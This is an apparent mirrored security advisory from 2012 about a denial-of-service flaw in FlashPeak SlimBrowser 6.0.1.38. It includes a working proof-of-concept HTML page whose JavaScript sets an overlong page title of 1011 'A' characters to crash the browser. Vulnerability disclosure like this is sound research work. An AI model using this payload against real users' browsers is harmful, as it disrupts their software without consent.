Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28093
HistoryMay 24, 2012 - 12:00 a.m.

FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability

2012-05-2400:00:00
vulners.com
21

Title: FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability
Software : FlashPeak SlimBrowser

Software Version : 6.0.1.38

Vendor: FlashPeak Inc.(www.flashpeak.com/)

Vulnerability Published : 2012-05-16

Vulnerability Update Time :

Status :

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
FlashPeak SlimBrowser is a web browser Software for FREE.
FlashPeak SlimBrowser contains one denial of service vulnerability about surfing a html file has a long web TITLE by remote or locality.

Proof Of Concept :

<html>
<head>
<title>evil page</title>
<body bgcolor="black">
<script type="text/javascript">
function a7(){
var buffer = "";
for (var i = 0; i < 1011; i++) {
buffer += "A";
}
document.title = buffer;
}
</script>
</head>
<body>
<font color="white">
<h5>==> <a href="javascript:a7();">'A'x1011</a> <==</h5><br>
<font>
</body>
</html>

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / [email protected]
Pentester/Researcher
Dark2S Security Team/PolyU.HK